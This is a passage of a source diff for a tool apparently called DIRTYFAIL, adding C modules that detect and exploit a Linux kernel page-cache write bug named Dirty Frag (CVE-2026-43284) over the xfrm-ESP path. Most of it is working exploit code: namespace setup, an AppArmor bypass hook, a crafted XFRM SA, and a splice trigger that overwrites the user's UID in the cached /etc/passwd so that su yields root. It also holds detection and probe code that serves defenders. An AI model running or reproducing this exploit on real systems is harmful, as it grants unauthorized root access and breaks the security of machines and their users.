CLONE_NEWNET) + * 3. child: write deny → /proc/self/setgroups + * 4. child: write "0 <uid> 1" → /proc/self/uid_map (and gid_map) + * 5. child: ioctl SIOCSIFFLAGS to bring lo UP + * 6. child: open NETLINK_XFRM, register SA with: + * proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN, + * alg=authencesn(hmac(sha256),cbc(aes)) (zero keys), + * encap=ESPINUDP sport=dport=4500, + * replay_esn.seq_hi = "0000" (the 4 bytes that will land) + * 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP + * and udp_send connected to 127.0.0.1:4500 + * 8. child: pipe(); vmsplice forged ESP wire header (24 bytes) → + * splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send + * 9. 
child: recvmsg drives the kernel through the esp_input path, + * firing the 4-byte STORE of "0000" into /etc/passwd + * at the user's UID offset + * 10. child: exits, parent verifies via fresh open of /etc/passwd + * 11. parent: execlp("su", username) β€” PAM checks /etc/shadow on + * disk (untouched), gets right password, setuid(0) lands + * us at root because the page-cache copy of /etc/passwd + * now lists us as UID 0. + */ + +#include "dirtyfrag_esp.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include +#include +#endif + +/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in , but that header + * conflicts with over `struct udphdr` and we don't + * actually need the struct. The kernel constants are stable, so we + * just hard-code them as fallbacks (the #ifndef makes this a no-op if + * the toolchain happens to expose them already). */ +#ifndef UDP_ENCAP +#define UDP_ENCAP 100 +#endif +#ifndef UDP_ENCAP_ESPINUDP +#define UDP_ENCAP_ESPINUDP 2 +#endif +#ifndef IPPROTO_ESP +#define IPPROTO_ESP 50 +#endif + +#ifndef __linux__ +#define CLONE_NEWUSER 0x10000000 +#define CLONE_NEWNET 0x40000000 +#define IFF_UP 0x01 +#define IFF_RUNNING 0x40 +#define SIOCSIFFLAGS 0x8914 +struct sockaddr_in { int dummy; }; +struct ifreq { int dummy; }; +__attribute__((unused)) +static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f) +{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; } +__attribute__((unused)) +static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d) +{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; } +__attribute__((unused)) +static int ioctl (int a, unsigned long b, ...) 
+{ (void)a;(void)b; errno=ENOSYS; return -1; } +#else +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, + size_t len, unsigned int flags); +extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, + unsigned int flags); +#endif + +#define ENCAP_PORT 4500 +#define ESP_SPI 0xDEADBE10 +#define MARKER "0000" +#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_detect(void) +{ + log_step("Dirty Frag β€” xfrm-ESP variant (CVE-2026-43284) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + /* The vulnerable branch was introduced in 2017 (cac2661c53f3) and + * the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily + * tell whether a particular distro kernel has the backport, so we + * report based on prereq presence and let the operator decide. */ + + /* esp4 / esp6 modules. They autoload on first XFRM SA registration, + * but we want to know if the build supports them at all. /proc/modules + * lists currently-loaded; that's a strong positive signal. */ + bool esp4 = kmod_loaded("esp4"); + bool esp6 = kmod_loaded("esp6"); + log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no"); + log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no"); + + bool userns = unprivileged_userns_allowed(); + log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); + + if (!userns) { + log_ok("xfrm-ESP variant unreachable without unprivileged userns"); + log_hint("on Ubuntu, this is the expected hardening β€” but the RxRPC " + "variant of Dirty Frag may still be reachable. Run with " + "--check-rxrpc."); + return DF_PRECOND_FAIL; + } + + if (!esp4 && !esp6) { + log_hint("no esp4/esp6 currently loaded; the kernel will autoload them " + "on first SA registration. 
We treat this as still vulnerable."); + } + + /* On hardened distros (Ubuntu 26.04+) caps are stripped inside the + * userns even after our bypass β€” kernel may still have the bug but + * unprivileged users can't reach it. Report that honestly rather + * than claiming VULNERABLE. */ + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” kernel may still have the bug but the AppArmor " + "policy denies CAP_NET_ADMIN inside any unprivileged userns."); + log_hint("unprivileged exploitation is blocked; real root can still " + "reach the kernel bug. Apply the kernel patch as soon as your " + "distro ships it."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel"); + df_result_t pr = dirtyfrag_esp_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE (preconditions met) β€” userns + xfrm SA registration " + "available, kernel within affected window"); + log_warn("apply mainline patch f4c50a4034e6 or your distro's backport"); + log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist " + "esp4/esp6 in /etc/modprobe.d/"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* ---------------------------------------------------------------- * + * Exploit β€” only compiled with full bodies on Linux. + * ---------------------------------------------------------------- */ + +#ifdef __linux__ + +/* Write a small string to a /proc file. 
*/ +static bool write_proc(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t want = strlen(value); + ssize_t got = write(fd, value, want); + close(fd); + return got == want; +} + +/* ---- Netlink XFRM SA registration --------------------------------- * + * + * The XFRM SA registration is built by hand. Each attribute is a 4-byte + * aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by + * payload. The total nlmsg length is filled in last. + * + * Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi. + */ +static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4]) +{ + char buf[2048] = {0}; + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + struct xfrm_usersa_info *usa = + (struct xfrm_usersa_info *)NLMSG_DATA(nlh); + + nlh->nlmsg_type = XFRM_MSG_NEWSA; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 1; + + /* Selector: src/dst 127.0.0.1, IPv4 */ + usa->sel.daddr.a4 = htonl(0x7f000001); + usa->sel.saddr.a4 = htonl(0x7f000001); + usa->sel.family = AF_INET; + usa->sel.prefixlen_d = 32; + usa->sel.prefixlen_s = 32; + + usa->id.daddr.a4 = htonl(0x7f000001); + usa->id.spi = htonl(ESP_SPI); + usa->id.proto = IPPROTO_ESP; + + usa->saddr.a4 = htonl(0x7f000001); + + usa->lft.soft_byte_limit = (uint64_t)-1; + usa->lft.hard_byte_limit = (uint64_t)-1; + usa->lft.soft_packet_limit = (uint64_t)-1; + usa->lft.hard_packet_limit = (uint64_t)-1; + + usa->reqid = 0x1234; + usa->family = AF_INET; + usa->mode = XFRM_MODE_TRANSPORT; + usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */ + usa->flags = XFRM_STATE_ESN; + + size_t hdrlen = sizeof(*nlh) + sizeof(*usa); + size_t attrs = 0; + char *abuf = buf + hdrlen; + + /* + * The kernel's xfrm code does NOT accept `authencesn(...)` as a + * single XFRMA_ALG_AEAD attribute β€” it's a composition that has + * to be assembled from separate auth + crypt parts. 
We register: + * XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV + * XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key + * + * The kernel internally wires these into authencesn(hmac(sha256), + * cbc(aes)) when it sees XFRM_STATE_ESN on the SA. + */ + { /* XFRMA_ALG_AUTH_TRUNC */ + struct xfrm_algo_auth *aa; + unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */ + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_AUTH_TRUNC; + r->rta_len = RTA_LENGTH(dlen); + aa = (struct xfrm_algo_auth *)RTA_DATA(r); + memset(aa, 0, dlen); + strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1); + aa->alg_key_len = 32 * 8; /* bits */ + aa->alg_trunc_len = 128; /* bits β€” truncated MAC width */ + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_ALG_CRYPT */ + struct xfrm_algo *ea; + unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */ + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_CRYPT; + r->rta_len = RTA_LENGTH(dlen); + ea = (struct xfrm_algo *)RTA_DATA(r); + memset(ea, 0, dlen); + strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1); + ea->alg_key_len = 16 * 8; + attrs += RTA_SPACE(dlen); + } + + /* XFRMA_REPLAY_ESN_VAL β€” this is where seq_hi rides */ + { + struct xfrm_replay_state_esn *esn; + unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */ + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_REPLAY_ESN_VAL; + r->rta_len = RTA_LENGTH(dlen); + esn = (struct xfrm_replay_state_esn *)RTA_DATA(r); + memset(esn, 0, dlen); + esn->bmp_len = 1; + esn->oseq = 0; + esn->seq = 100; + esn->oseq_hi = 0; + memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */ + esn->replay_window = 32; + attrs += RTA_SPACE(dlen); + } + + /* XFRMA_ENCAP β€” UDP encapsulation, sport=dport=4500 */ + { + struct xfrm_encap_tmpl *enc; + unsigned short dlen = sizeof(*enc); + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ENCAP; + r->rta_len = 
RTA_LENGTH(dlen); + enc = (struct xfrm_encap_tmpl *)RTA_DATA(r); + memset(enc, 0, dlen); + enc->encap_type = UDP_ENCAP_ESPINUDP; + enc->encap_sport = htons(ENCAP_PORT); + enc->encap_dport = htons(ENCAP_PORT); + enc->encap_oa.a4 = 0; + attrs += RTA_SPACE(dlen); + } + + nlh->nlmsg_len = hdrlen + attrs; + + struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK }; + if (sendto(nl, buf, nlh->nlmsg_len, 0, + (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) + return false; + + /* Drain ACK */ + char ack[4096]; + ssize_t n = recv(nl, ack, sizeof(ack), 0); + if (n < (ssize_t)sizeof(struct nlmsghdr)) return false; + struct nlmsghdr *r = (struct nlmsghdr *)ack; + if (r->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r); + if (e->error != 0) { + log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error)); + return false; + } + } + return true; +} + +/* Bring loopback up inside the new netns. */ +static bool bring_lo_up(void) +{ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return false; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + ifr.ifr_flags = IFF_UP | IFF_RUNNING; + int rc = ioctl(s, SIOCSIFFLAGS, &ifr); + close(s); + return rc == 0; +} + +/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload + * is a page-cache page from `target_path`, planted via splice at + * `splice_off`. The kernel STORE lands ~14 bytes into the spliced + * region (the v4 path has no V6_STORE_SHIFT-style offset). */ +static bool trigger_store_at(const char *target_path, loff_t splice_off) +{ + /* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so + * incoming UDP frames are rerouted into xfrm_input -> esp_input. 
*/ + int udp_recv = socket(AF_INET, SOCK_DGRAM, 0); + if (udp_recv < 0) return false; + struct sockaddr_in addr = { + .sin_family = AF_INET, + .sin_port = htons(ENCAP_PORT), + .sin_addr.s_addr = htonl(0x7f000001), + }; + int reuse = 1; + setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); + if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("bind udp_recv: %s", strerror(errno)); + close(udp_recv); return false; + } + int encap = UDP_ENCAP_ESPINUDP; + if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { + log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno)); + close(udp_recv); return false; + } + + /* udp_send: connect to udp_recv. Packets we splice here will arrive + * at udp_recv via loopback and feed xfrm_input. */ + int udp_send = socket(AF_INET, SOCK_DGRAM, 0); + if (udp_send < 0) { close(udp_recv); return false; } + if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("connect udp_send: %s", strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + /* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes. + * IV value doesn't matter β€” auth check fails after the STORE. */ + unsigned char wire_hdr[24]; + *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI); + *(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */ + memset(wire_hdr + 8, 0xCC, 16); + + /* Open the target file for splicing. */ + int pfd = open(target_path, O_RDONLY); + if (pfd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + int p[2]; + if (pipe(p) < 0) { + log_bad("pipe: %s", strerror(errno)); + close(pfd); close(udp_recv); close(udp_send); return false; + } + + /* vmsplice the wire header into the pipe (24 bytes). 
*/ + struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) }; + if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) { + log_bad("vmsplice header: %s", strerror(errno)); + close(p[0]); close(p[1]); close(pfd); + close(udp_recv); close(udp_send); return false; + } + /* splice 16 bytes of target's page cache from splice_off. */ + loff_t off = splice_off; + if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) { + log_bad("splice file->pipe: %s", strerror(errno)); + close(p[0]); close(p[1]); close(pfd); + close(udp_recv); close(udp_send); return false; + } + /* splice the whole 40-byte payload from pipe to udp_send. */ + if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) { + log_bad("splice pipe->udp: %s", strerror(errno)); + close(p[0]); close(p[1]); close(pfd); + close(udp_recv); close(udp_send); return false; + } + close(p[0]); close(p[1]); + + /* Drive the receive β€” esp_input runs inline here, performs the + * scratch-write, and we don't really care about the actual recv + * data (auth will fail with EBADMSG). + * + * The usleep gives the kernel a hard guarantee that the in-place + * decrypt has finished and the page-cache STORE is visible before + * we tear down the sockets. On a busy or slow VM, splice() can + * return before esp_input has actually fired. V4bel's reference + * exploit uses the same 150ms wait. */ + usleep(150 * 1000); + unsigned char drain[256]; + (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT); + + close(pfd); + close(udp_recv); + close(udp_send); + return true; +} + +/* Compatibility wrapper for the exploit path: target /etc/passwd. 
*/ +static bool trigger_store(off_t passwd_off) +{ + return trigger_store_at("/etc/passwd", passwd_off); +} + +__attribute__((unused)) +static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) +{ + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { + log_bad("unshare: %s", strerror(errno)); + return 1; + } + if (!write_proc("/proc/self/setgroups", "deny")) { + log_bad("setgroups deny: %s", strerror(errno)); + return 1; + } + char map[64]; + snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid); + if (!write_proc("/proc/self/uid_map", map)) { + log_bad("uid_map: %s", strerror(errno)); + return 1; + } + snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid); + if (!write_proc("/proc/self/gid_map", map)) { + log_bad("gid_map: %s", strerror(errno)); + return 1; + } + if (!bring_lo_up()) { + log_bad("bring lo up: %s", strerror(errno)); + return 1; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("AF_NETLINK XFRM: %s", strerror(errno)); + return 1; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("bind netlink: %s", strerror(errno)); + close(nl); return 1; + } + + if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return 1; + } + log_ok("XFRM SA registered with seq_hi='%s'", MARKER); + + if (!trigger_store(passwd_off)) { + log_bad("trigger failed"); + close(nl); return 1; + } + log_ok("ESP-in-UDP trigger fired"); + + close(nl); + return 0; +} + +#else /* __linux__ */ +__attribute__((unused)) +static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) +{ + (void)passwd_off; (void)real_uid; (void)real_gid; + return 1; +} +#endif + +/* ---------------------------------------------------------------- * + * INNER β€” runs in the AA bypass userns (post-stage 2). + * + * No user interaction, no fork, no verify, no su. 
Just the kernel + * work: open netlink, register SA, fire splice trigger, exit. + * The parent (init ns) owns everything else. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_exploit_inner(void) +{ +#ifdef __linux__ + const char *user = getenv("DIRTYFAIL_TARGET_USER"); + if (!user || !*user) { + log_bad("inner: DIRTYFAIL_TARGET_USER not set"); + return DF_TEST_ERROR; + } + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("inner: find_passwd_uid_field('%s') failed", user); + return DF_TEST_ERROR; + } + if (uid_len != 4) { + log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len); + return DF_TEST_ERROR; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("inner: bind netlink: %s", strerror(errno)); + close(nl); + return DF_EXPLOIT_FAIL; + } + + if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); + return DF_EXPLOIT_FAIL; + } + log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER); + + if (!trigger_store(uid_off)) { + close(nl); + return DF_EXPLOIT_FAIL; + } + log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld", + (long long)uid_off); + + close(nl); + return DF_EXPLOIT_OK; +#else + log_bad("dirtyfrag_esp_exploit_inner: Linux-only"); + return DF_TEST_ERROR; +#endif +} + +/* ---------------------------------------------------------------- * + * OUTER β€” runs in init namespace. + * + * Prompts the operator, sets env vars, fork β†’ child arms AA bypass + * and runs the inner. 
Parent stays in init ns, waits, reads the + * global page cache to verify, then either: + * - do_shell=true: execlp("su", user) β€” runs in init ns β†’ + * PAM reads modified /etc/passwd β†’ uid 0 β†’ real init-ns root + * - do_shell=false: try_revert_passwd_page_cache, return. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_exploit(bool do_shell) +{ + log_step("Dirty Frag (xfrm-ESP) β€” exploit"); + + uid_t uid = getuid(); + if (uid == 0) { + log_warn("already root in init namespace β€” nothing to escalate"); + return DF_OK; + } + struct passwd *pw = getpwuid(uid); + if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } + const char *user = pw->pw_name; + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("could not find %s in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd UID for %s: '%s' at offset %lld", + user, uid_str, (long long)uid_off); + if (uid_len != 4) { + log_bad("UID '%s' is %zu chars; this technique needs exactly 4", + uid_str, uid_len); + return DF_TEST_ERROR; + } + + log_warn("about to run xfrm-ESP page-cache write against /etc/passwd"); + log_warn("this enters a fresh user/net namespace, registers an XFRM SA, " + "and sends an ESP-in-UDP packet whose payload is the /etc/passwd " + "page from offset %lld", (long long)uid_off); + log_warn("on success the page cache will report '%s' as UID 0", user); + log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + return DF_OK; + } + if (!ssh_lockout_check(user)) { + log_bad("SSH-lockout confirmation declined β€” aborting"); + return DF_OK; + } + + /* Hand off to the inner via env vars + AA bypass fork. 
+ * + * The child fork enters the bypass userns, runs + * dirtyfrag_esp_exploit_inner (dispatched from main() based on + * DIRTYFAIL_INNER_MODE), modifies the global page cache, exits. + * We (parent, init ns) read the result via the same global page + * cache and execlp(su) here in init ns for REAL root. */ + setenv("DIRTYFAIL_INNER_MODE", "esp", 1); + setenv("DIRTYFAIL_TARGET_USER", user, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */ + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init namespace β€” page cache is global, so we see the + * child's modification here. */ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, MARKER, 4) != 0) { + log_bad("write did not land β€” page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0", user); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' in init namespace β€” enter your password for REAL root", user); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” used by `--scan --active`. + * + * Same userns + XFRM SA + splice-trigger setup as the exploit, but + * targets a sentinel file in /tmp instead of /etc/passwd. The parent + * (init ns) reads the sentinel after the child returns and looks for + * the marker bytes. 
+ * + * If the marker landed β†’ kernel STORE is reachable β†’ DF_VULNERABLE. + * If the page is intact β†’ kernel is patched β†’ DF_OK. + * If AA blocks the bypass β†’ DF_PRECOND_FAIL. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_active_probe_inner(void) +{ +#ifdef __linux__ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("active-probe: netlink xfrm: %s", strerror(errno)); + return DF_TEST_ERROR; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("active-probe: bind netlink: %s", strerror(errno)); + close(nl); return DF_TEST_ERROR; + } + if (!bring_lo_up()) { + log_bad("active-probe: bring lo up: %s", strerror(errno)); + close(nl); return DF_TEST_ERROR; + } + if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return DF_TEST_ERROR; + } + if (!trigger_store_at(sentinel, 0)) { + close(nl); return DF_TEST_ERROR; + } + close(nl); + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +df_result_t dirtyfrag_esp_active_probe(void) +{ + /* Sentinel file: 4 KiB of 'A' bytes. */ + char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + /* Fault the page in. 
*/ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("active-probe inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + /* Re-read sentinel and search for marker. */ + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + for (int i = 0; i + 4 <= got; i++) { + if (memcmp(after + i, MARKER, 4) == 0) { + log_warn("ACTIVE PROBE: STORE landed at offset %d β†’ kernel is VULNERABLE", i); + return DF_VULNERABLE; + } + } + log_ok("ACTIVE PROBE: page intact β€” kernel ESP path appears patched"); + return DF_OK; +} diff --git a/modules/copy_fail_family/dirtyfrag_esp.h b/modules/copy_fail_family/dirtyfrag_esp.h new file mode 100644 index 0000000..57c3706 --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp.h @@ -0,0 +1,40 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp.h + * + * Public surface for the Dirty Frag xfrm-ESP variant (CVE-2026-43284). + */ + +#ifndef DIRTYFAIL_DIRTYFRAG_ESP_H +#define DIRTYFAIL_DIRTYFRAG_ESP_H + +#include "common.h" + +/* Run all preconditions for the xfrm-ESP primitive. Detection here is + * precondition-only: we do not register an SA in detect mode because + * doing so requires a fresh user namespace and side-effects loopback + * routing inside that namespace. Returns DF_VULNERABLE if all + * prerequisites are satisfied. 
*/ +df_result_t dirtyfrag_esp_detect(void); + +/* OUTER (init namespace): user prompts β†’ resolve target β†’ fork β†’ + * wait for child to do the kernel work β†’ read global page cache to + * verify β†’ if do_shell, execlp("su", user) in init ns for REAL + * init-ns root via PAM. */ +df_result_t dirtyfrag_esp_exploit(bool do_shell); + +/* INNER (bypass userns): runs after AA bypass stage 2. Reads + * DIRTYFAIL_TARGET_USER from env, registers XFRM SA with seq_hi + * "0000", fires the splice trigger. No prompts, no su, no verify β€” + * the parent owns those. Exits with df_result_t cast to int. */ +df_result_t dirtyfrag_esp_exploit_inner(void); + +/* Active probe: fires the v4 ESP-in-UDP trigger against a /tmp sentinel + * file (never /etc/passwd) and reports whether the marker landed. + * Used by `--scan --active`. The inner half runs in the bypass userns + * and reads DIRTYFAIL_PROBE_SENTINEL for the target path. Returns + * DF_VULNERABLE on marker hit, DF_OK if patched, DF_PRECOND_FAIL on + * AA-block, DF_TEST_ERROR otherwise. */ +df_result_t dirtyfrag_esp_active_probe(void); +df_result_t dirtyfrag_esp_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/dirtyfrag_esp6.c b/modules/copy_fail_family/dirtyfrag_esp6.c new file mode 100644 index 0000000..58494c3 --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp6.c @@ -0,0 +1,698 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp6.c β€” Dirty Frag IPv6 xfrm-ESP variant + * CVE-2026-43284 (IPv6 path) + * + * Reuses the same primitive shape as `dirtyfrag_esp.c`. See that file + * for the underlying root-cause analysis. This module differs only in + * the network-layer transport (AF_INET6 / ::1) and in padding the ESP + * frame to clear the v6-only size gate. 
+ */ + +#include "dirtyfrag_esp6.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include + +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, + size_t len, unsigned int flags); +extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, + unsigned int flags); +#endif + +#ifndef UDP_ENCAP +#define UDP_ENCAP 100 +#endif +#ifndef UDP_ENCAP_ESPINUDP +#define UDP_ENCAP_ESPINUDP 2 +#endif +#ifndef IPPROTO_ESP +#define IPPROTO_ESP 50 +#endif + +#define ENCAP_PORT 4500 +#define ESP_SPI 0xDEADBE60 +#define MARKER "0000" +#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" + +/* xfrm6_input.c rejects skb->len < 48. Our wire layout is + * SPI(4)+seq(4)+IV(16)+target(16)+pad = 40+pad. Pad to 48 bytes. */ +#define V6_PAD_BYTES 8 + +/* Empirical STORE-offset shift between v4 and v6 paths. + * + * In v4, the authencesn scratch-write at dst[assoclen+cryptlen]=dst[24] + * lands at file_offset == splice_off (we proved this end-to-end on Ubuntu + * 24.04, kernel 6.8.0-111). In v6, with our [hdr(24)][passwd(16)][pad(8)] + * wire layout, the 